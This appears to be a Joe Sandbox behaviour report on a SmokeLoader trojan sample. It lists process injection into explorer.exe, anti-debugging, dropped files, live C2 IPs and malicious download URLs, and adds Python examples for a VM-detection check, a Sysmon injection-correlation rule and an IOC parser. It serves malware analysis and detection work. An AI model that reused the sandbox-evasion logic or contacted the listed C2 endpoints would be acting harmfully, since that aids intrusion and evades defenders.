      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_00407585 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Code function: 0_2_005D092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Code function: 0_2_005D0D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Code function: 0_2_0065E39D push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 5_2_006D092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 5_2_006D0D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 5_2_006FBCC5 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe  Code function: 6_2_00007FF7DAD611AD _initterm,SetUnhandledExceptionFilter
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe  Code function: 7_2_00007FF65B0310F8 Sleep,_initterm,_initterm,SetUnhandledExceptionFilter
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_00404464 SetUnhandledExceptionFilter
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_0040946E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_004024D6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
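The VM check behind the Enum\SCSI enumeration recorded above, as an added example that is not code from the report or from the sample: it classifies storage device instance IDs for hypervisor vendor markers (the Ven_VMware and NECVMWar strings the report recovered from explorer.exe memory) and separates them from markers that also occur on physical machines. The report shows only the key enumeration and the strings, not the sample's own comparison, so the substring matching is the editor's reconstruction of the technique in general; the hardened device IDs and the VirtualBox/QEMU markers are the editor's additions.

```python
r"""Added example, not code from the Joe Sandbox report or from the sample.

The report shows the sample enumerating HKLM\SYSTEM\ControlSet001\Enum\SCSI and
later finds hypervisor strings (Ven_VMware, NECVMWar, Ven_Msft&Prod_Virtual_DVD-ROM,
"Hyper-V RAW") in process memory. This module classifies such device instance
IDs the way a disk-enumeration VM check does. Assumption: substring matching
is a reconstruction of the technique; the sample's own comparison is not shown.
"""
from typing import Dict, Iterable, List

# Strong markers: only present when the storage stack itself is virtual.
# The VMware entries are verbatim from this report; VirtualBox and QEMU/KVM
# entries are well-known markers added by the editor.
STRONG_MARKERS = {
    "vmware": ("ven_vmware", "necvmwar", "vmware_sata", "vmware_virtual"),
    "virtualbox": ("vbox", "virtualbox"),
    "qemu/kvm": ("qemu", "virtio", "ven_red_hat"),
}

# Weak markers: seen in this report, but also on bare metal. "Msft Virtual
# DVD-ROM" appears whenever an ISO is mounted, "Msft Virtual Disk" whenever a
# VHD is mounted, and "Hyper-V RAW" is the Winsock provider name for AF_HYPERV
# sockets registered on ordinary Windows 10/11 installations.
WEAK_MARKERS = {
    "hyper-v": ("ven_msft&prod_virtual_dvd-rom", "ven_msft&prod_virtual_disk", "hyper-v raw"),
}


def classify_device(instance_id: str) -> Dict[str, str]:
    """Return {"vendor": ..., "strength": "strong"|"weak"}, or {} if clean."""
    s = instance_id.lower()
    for vendor, markers in STRONG_MARKERS.items():
        if any(m in s for m in markers):
            return {"vendor": vendor, "strength": "strong"}
    for vendor, markers in WEAK_MARKERS.items():
        if any(m in s for m in markers):
            return {"vendor": vendor, "strength": "weak"}
    return {}


def scan_enum(instance_ids: Iterable[str]) -> Dict[str, List[str]]:
    """Group matching IDs by strength; an empty dict means nothing matched."""
    hits: Dict[str, List[str]] = {}
    for dev in instance_ids:
        c = classify_device(dev)
        if c:
            hits.setdefault(c["strength"], []).append(dev)
    return hits


def verdict(instance_ids: Iterable[str]) -> str:
    """'vm' on any strong marker, 'suspect' on weak markers only, else 'physical'."""
    hits = scan_enum(instance_ids)
    if "strong" in hits:
        return "vm"
    if "weak" in hits:
        return "suspect"
    return "physical"


# Constructed input: the device IDs this report captured from explorer.exe
# memory, i.e. what the sample's walk of Enum\SCSI returned in the sandbox.
REPORT_SANDBOX_IDS = [
    r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000",
    r"SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000",
    r"SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001",
]

# Constructed input: a hardened analysis VM whose disk and CD vendor strings
# were renamed, leaving only the ISO-mount device (hypothetical IDs).
HARDENED_IDS = [
    r"SCSI\Disk&Ven_SAMSUNG&Prod_SSD_870_EVO\4&1a2b3c4d&0&000000",
    r"SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001",
]

if __name__ == "__main__":
    for name, ids in (("report sandbox", REPORT_SANDBOX_IDS), ("hardened", HARDENED_IDS)):
        print(name, verdict(ids), scan_enum(ids))
```

Renaming the vendor strings only removes this one check; the report also records a GetSystemTimes timing comparison, long sleep loops and a DebugPort query, so a sandbox that passes the disk check still has to survive those.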

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe  File created: AA31.exe.1.dr
      Source: C:\Windows\explorer.exe  Network Connect: 45.130.41.250 443
      Source: C:\Windows\explorer.exe  Network Connect: 190.187.52.42 80
      Source: C:\Windows\explorer.exe  Network Connect: 58.151.148.90 80
      Source: C:\Windows\explorer.exe  Network Connect: 185.149.100.242 443
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Thread created: C:\Windows\explorer.exe EIP: 11F19D0
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Thread created: unknown EIP: 30319D0
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1749250515.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1748334903.00000000018A1000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_00409824 GetLocaleInfoA
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Code function: 0_2_0042379F GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,GetSystemWindowsDirectoryW,WriteConsoleW,IntersectRect,FlushInstructionCache,GetAtomNameA,GlobalDeleteAtom,GetCurrentConsoleFont,SearchPathA,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerA,HeapLock,FormatMessageW,GlobalAlloc,LoadLibraryA
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
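Detection logic for the chain recorded in this section (a binary under the user profile creates a thread in explorer.exe, and the injected explorer.exe then connects out, drops PE files and starts them), as an added example that is not part of the report. It runs over constructed Sysmon-style events: the images, IPs, ports and file names are taken from this report, while the PIDs, timestamps, the private-address connection and the uninjected control explorer.exe are invented.

```python
"""Added example, not from the Joe Sandbox report or the sample's code.

Rule: once a process from a user-writable path creates a thread in a Windows
system binary (Sysmon event 8), that system process's outbound connections to
public addresses (event 3), PE drops under the profile (event 11) and child
processes started from Temp/AppData (event 1) are attributed to the injector.
"""
import ipaddress
from typing import Dict, List

# Windows binaries that should never receive a remote thread from a user path.
SYSTEM_BINARIES = {r"c:\windows\explorer.exe", r"c:\windows\system32\svchost.exe"}
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def is_dropped_binary(path: str) -> bool:
    """PE-like drop under AppData/Temp: .exe/.dll, or no extension at all (the
    report's persistence file 'ashcvvs' has none). Alternate data streams such
    as ashcvvs:Zone.Identifier are not counted as drops."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    if ":" in name or not ("\\appdata\\" in p or "\\temp\\" in p):
        return False
    return name.endswith((".exe", ".dll")) or "." not in name


def is_public_ip(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_multicast)


def correlate(events: List[Dict]) -> List[Dict]:
    """Return alerts {rule, pid, evidence}; injection must precede the rest.

    Event shapes (subset of Sysmon fields, constructed):
      8: source_image, target_image, target_pid   (CreateRemoteThread)
      3: pid, image, dst_ip, dst_port             (NetworkConnect)
     11: pid, image, target_file                  (FileCreate)
      1: parent_pid, child_image                  (ProcessCreate)
    """
    injected: Dict[int, str] = {}  # target pid -> injecting image
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        eid = ev["id"]
        if eid == 8:
            if is_user_writable(ev["source_image"]) and ev["target_image"].lower() in SYSTEM_BINARIES:
                injected[ev["target_pid"]] = ev["source_image"]
                alerts.append({"rule": "remote_thread_into_system_process",
                               "pid": ev["target_pid"],
                               "evidence": ev["source_image"] + " -> " + ev["target_image"]})
            continue
        pid = ev["parent_pid"] if eid == 1 else ev["pid"]
        if pid not in injected:
            continue  # only already-injected processes are of interest
        injector = injected[pid]
        if eid == 3 and is_public_ip(ev["dst_ip"]):
            alerts.append({"rule": "injected_system_process_beacons", "pid": pid,
                           "evidence": f'{ev["dst_ip"]}:{ev["dst_port"]} (injector {injector})'})
        elif eid == 11 and is_dropped_binary(ev["target_file"]):
            alerts.append({"rule": "injected_system_process_drops_pe", "pid": pid,
                           "evidence": ev["target_file"]})
        elif eid == 1 and is_user_writable(ev["child_image"]):
            alerts.append({"rule": "injected_system_process_spawns_from_user_path", "pid": pid,
                           "evidence": ev["child_image"]})
    return alerts


EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE = r"C:\Users\user\Desktop\n72I7qB2ss.exe"

# Constructed telemetry mirroring the report's process chain (PIDs invented).
EVENTS = [
    # Control: a second explorer.exe (pid 4100) that nobody injected into.
    {"ts": 10, "id": 3, "pid": 4100, "image": EXPLORER, "dst_ip": "203.0.113.5", "dst_port": 443},
    {"ts": 20, "id": 8, "source_image": SAMPLE, "target_image": EXPLORER, "target_pid": 1200},
    {"ts": 30, "id": 11, "pid": 1200, "image": EXPLORER,
     "target_file": r"C:\Users\user\AppData\Roaming\ashcvvs"},
    {"ts": 31, "id": 11, "pid": 1200, "image": EXPLORER,
     "target_file": r"C:\Users\user\AppData\Roaming\ashcvvs:Zone.Identifier"},
    {"ts": 40, "id": 3, "pid": 1200, "image": EXPLORER, "dst_ip": "45.130.41.250", "dst_port": 443},
    {"ts": 41, "id": 3, "pid": 1200, "image": EXPLORER, "dst_ip": "58.151.148.90", "dst_port": 80},
    {"ts": 50, "id": 11, "pid": 1200, "image": EXPLORER,
     "target_file": r"C:\Users\user\AppData\Local\Temp\70C1.exe"},
    {"ts": 60, "id": 1, "parent_pid": 1200, "child_image": r"C:\Users\user\AppData\Local\Temp\70C1.exe"},
    # Constructed private-address connection from the injected process: not a beacon.
    {"ts": 70, "id": 3, "pid": 1200, "image": EXPLORER, "dst_ip": "10.0.0.5", "dst_port": 445},
]

if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a["rule"], a["pid"], a["evidence"])
```

The injection event is the anchor: explorer.exe connecting to the internet or writing under AppData is normal on its own, which is why the report's "System process connects to network" and "Benign windows process drops PE files" signatures only carry weight together with the thread creation from the Desktop binary.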

      Stealing of Sensitive Information

      Source: Yara match  File source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match  File source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match  File source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match  File source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match  File source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match  File source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match  File source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match  File source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
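A parser for the flattened "Source: <image><signature>: <detail>Jump to behavior" lines that make up the signature sections above, as an added example that is not Joe Sandbox code: it splits each line into source, signature and detail and derives an IOC set (C2 endpoints, dropped files, injection targets, registry keys queried). The excerpt is copied verbatim from this report; the signature names it recognises are the ones that occur on this page, and the assumption that other Joe Sandbox signatures follow the same "<name>: <detail>" shape is the editor's.

```python
"""Added example, not from Joe Sandbox: parse this report's flattened
signature lines and extract IOCs from them. The report glues the source
image, the signature name and the detail together and appends link text
("Jump to behavior" / "Jump to dropped file"); this code undoes that.
"""
import re
from typing import Dict, List

# Signature names that occur on this page (assumption: others use the same shape).
SIGNATURES = (
    "Network Connect", "File created", "Thread created", "Section loaded",
    "Key enumerated", "Key value queried", "Process queried",
    "Binary or memory string", "Window / User API", "API coverage",
    "Code function", "Thread sleep count", "Thread sleep time",
)
_LINE = re.compile(
    r"^Source:\s*(?P<source>.*?)(?P<signature>" + "|".join(map(re.escape, SIGNATURES)) +
    r"):\s*(?P<detail>.*?)(?:Jump to behavior|Jump to dropped file)?\s*$"
)
_DROP_SUFFIX = re.compile(r"\.\d+\.dr$")  # Joe names dropped files <name>.<pid>.dr


def parse_lines(text: str) -> List[Dict[str, str]]:
    """One record per recognised line: source, signature, detail, actor (source without TID)."""
    records = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        d = m.groupdict()
        d["actor"] = re.sub(r"\s+TID:\s*\d+$", "", d["source"]).strip()
        records.append(d)
    return records


def extract_iocs(records: List[Dict[str, str]]) -> Dict[str, List[str]]:
    endpoints, dropped, targets, registry, evasion = set(), [], [], [], []
    for r in records:
        sig, detail = r["signature"], r["detail"]
        if sig == "Network Connect":                 # "45.130.41.250 443"
            ip, port = detail.split()
            endpoints.add(f"{ip}:{int(port)}")
        elif sig == "File created":                  # "AA31.exe.1.dr"
            dropped.append(_DROP_SUFFIX.sub("", detail))
        elif sig == "Thread created":                # "C:\Windows\explorer.exe EIP: 11F19D0"
            targets.append(detail.split(" EIP:")[0].strip())
        elif sig in ("Key enumerated", "Key value queried"):
            registry.append(detail)
        elif sig in ("Thread sleep count", "Thread sleep time"):
            evasion.append(f"{sig}: {detail}")
    return {
        "c2_endpoints": sorted(endpoints),
        "dropped_files": dropped,
        "injection_targets": sorted(set(targets)),
        "registry": registry,
        "analysis_evasion": evasion,
        "actors": sorted({r["actor"] for r in records}),
    }


# Constructed input: lines copied verbatim from this report.
REPORT_EXCERPT = r"""
Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
Source: C:\Windows\explorer.exeFile created: AA31.exe.1.drJump to dropped file
Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.250 443Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 190.187.52.42 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
Source: C:\Users\user\Desktop\n72I7qB2ss.exeThread created: C:\Windows\explorer.exe EIP: 11F19D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\70C1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\explorer.exe TID: 5104Thread sleep count: 2747 > 30Jump to behavior
"""

if __name__ == "__main__":
    for key, values in extract_iocs(parse_lines(REPORT_EXCERPT)).items():
        print(key, values)
```

The non-greedy source group stops at the first recognised signature name, which is what makes the glued "explorer.exeNetwork Connect" boundary recoverable without a separator; a line whose signature is not in the list is skipped rather than mis-split.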
      MITRE ATT&CK Matrix (techniques with matching signatures; the number in front of each technique is the signature count the matrix displays, kept as shown)

      Execution: 2 Command and Scripting Interpreter; 1 Native API; 1 Exploitation for Client Execution
      Persistence: 1 DLL Side-Loading
      Privilege Escalation: 32 Process Injection; 1 DLL Side-Loading
      Defense Evasion: 11 Masquerading; 2 Virtualization/Sandbox Evasion; 32 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Hidden Files and Directories; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion
      Discovery: 11 System Time Discovery; 421 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 124 System Information Discovery
      Collection: 1 Archive Collected Data
      Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 115 Application Layer Protocol
      Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no matching signatures
      Behavior Graph (text recovered from the graph rendering)
      Behavior Graph ID: 1488759  Sample: n72I7qB2ss.exe  Start date: 06/08/2024  Architecture: WINDOWS  Score: 100
      Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
      Contacted hosts: mzxn.ru; mussangroup.com; 2 other IPs or domains

      n72I7qB2ss.exe (started)
        Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Maps a DLL or memory area into another process; 3 other signatures
        -> explorer.exe (injected; node counters 56, 7)
             Network: mussangroup.com 185.149.100.242, 443, 49754 (VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi, Turkey); mzxn.ru 58.151.148.90, 49736, 49737, 49738 (POWERVIS-AS-KRLGPOWERCOMMKR, Korea Republic of); 2 other IPs or domains
             Dropped: C:\Users\user\AppData\Roaming\ashcvvs (PE32); C:\Users\user\AppData\Local\Temp\AA31.exe (PE32+); C:\Users\user\AppData\Local\Temp\70C1.exe (PE32+); C:\Users\user\...\ashcvvs:Zone.Identifier (ASCII)
             Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
             -> 70C1.exe (started)
                  Network: mundoparachicas.space 188.114.97.3, 443, 49757, 49758 (CLOUDFLARENETUS, European Union)
                  Signatures: Multi AV Scanner detection for dropped file
             -> AA31.exe (started)
      ashcvvs (started)
        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
      ashcvvs (started, second instance)



      Submitted sample (Source | Detection | Scanner | Label)
      n72I7qB2ss.exe | 71% | ReversingLabs | Win32.Trojan.SmokeLoader
      n72I7qB2ss.exe | 58% | Virustotal |
      n72I7qB2ss.exe | 100% | Avira | HEUR/AGEN.1318094
      n72I7qB2ss.exe | 100% | Joe Sandbox ML |

      Dropped files (Source | Detection | Scanner | Label)
      C:\Users\user\AppData\Roaming\ashcvvs | 100% | Avira | HEUR/AGEN.1318094
      C:\Users\user\AppData\Roaming\ashcvvs | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\Local\Temp\70C1.exe | 32% | ReversingLabs |
      C:\Users\user\AppData\Local\Temp\AA31.exe | 54% | ReversingLabs | Win32.Trojan.Generic
      C:\Users\user\AppData\Roaming\ashcvvs | 71% | ReversingLabs | Win32.Trojan.SmokeLoader
      No Antivirus matches
      No Antivirus matches
      URLs (Source | Detection | Scanner | Label)
      https://aka.ms/odirmr | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | 0% | URL Reputation | safe
      https://powerpoint.office.comcember | 0% | URL Reputation | safe
      https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
      https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | 0% | URL Reputation | safe
      https://excel.office.com | 0% | URL Reputation | safe
      http://schemas.micro | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | 0% | URL Reputation | safe
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | 0% | URL Reputation | safe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | 0% | URL Reputation | safe
      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi | 0% | URL Reputation | safe
      https://api.msn.com/q | 0% | URL Reputation | safe
      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc | 0% | URL Reputation | safe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1 | 0% | URL Reputation | safe
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark | 0% | URL Reputation | safe
      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A | 0% | URL Reputation | safe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | URL Reputation | safe
      https://wns.windows.com/L | 0% | URL Reputation | safe
      https://word.office.com | 0% | URL Reputation | safe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent | 0% | URL Reputation | safe
      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | 0% | URL Reputation | safe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | 0% | URL Reputation | safe
      https://aka.ms/Vh5j3k | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | 0% | URL Reputation | safe
      https://api.msn.com/v1/news/Feed/Windows?& | 0% | URL Reputation | safe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | 0% | URL Reputation | safe
      https://www.rd.com/list/polite-habits-campers-dislike/ | 0% | URL Reputation | safe
      http://olinsw.ws/tmp/index.php | 0% | Avira URL Cloud | safe
      http://100xmargin.com/tmp/index.php | 100% | Avira URL Cloud | malware
      https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar | 0% | URL Reputation | safe
      https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO | 0% | Avira URL Cloud | safe
      https://api.msn.com/ | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d | 0% | URL Reputation | safe
      https://outlook.com_ | 0% | URL Reputation | safe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe
      https://www.msn.com:443/en-us/feed | 0% | URL Reputation | safe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | 0% | URL Reputation | safe
      https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | 0% | URL Reputation | safe
      https://mundoparachicas.space/Lp_ | 0% | Avira URL Cloud | safe
      http://wgdnb4rc.xyz/tmp/index.php | 0% | Avira URL Cloud | safe
      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of | 0% | URL Reputation | safe
      https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D | 0% | Avira URL Cloud | safe
      https://mussangroup.com/wp-content/images/pic5.jpg | 100% | Avira URL Cloud | malware
      http://mzxn.ru/tmp/index.php | 100% | Avira URL Cloud | malware
      http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
      https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LO | 0% | Avira URL Cloud | safe
      https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D | 0% | Avira URL Cloud | safe
      https://browserupdater.com/build.exe | 0% | Avira URL Cloud | safe
      https://mundoparachicas.space/ | 0% | Avira URL Cloud | safe
      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | Avira URL Cloud | safe
      Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
      browserupdater.com | 45.130.41.250 | true | true | | unknown
      mzxn.ru | 58.151.148.90 | true | true | | unknown
      mundoparachicas.space | 188.114.97.3 | true | false | | unknown
      mussangroup.com | 185.149.100.242 | true | true | | unknown
      Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
      http://100xmargin.com/tmp/index.php | true | Avira URL Cloud: malware | unknown
      http://olinsw.ws/tmp/index.php | true | Avira URL Cloud: safe | unknown
      http://wgdnb4rc.xyz/tmp/index.php | true | Avira URL Cloud: safe | unknown
      https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D | false | Avira URL Cloud: safe | unknown
      http://mzxn.ru/tmp/index.php | true | Avira URL Cloud: malware | unknown
      https://mussangroup.com/wp-content/images/pic5.jpg | true | Avira URL Cloud: malware | unknown
      https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D | false | Avira URL Cloud: safe | unknown
      https://browserupdater.com/build.exe | true | Avira URL Cloud: safe | unknown

      Three of the endpoints the sandbox marks malicious (olinsw.ws and wgdnb4rc.xyz /tmp/index.php, browserupdater.com/build.exe) are still rated safe by Avira URL Cloud; the reputation column lags behind the behavioural verdict and is not an all-clear.
IP | Domain | Country | ASN | ASN Name | Malicious
45.130.41.250 | browserupdater.com | Russian Federation | 198610 | BEGET-ASRU | true
190.187.52.42 | unknown | Peru | 19180 | AMERICATELPERUSAPE | true
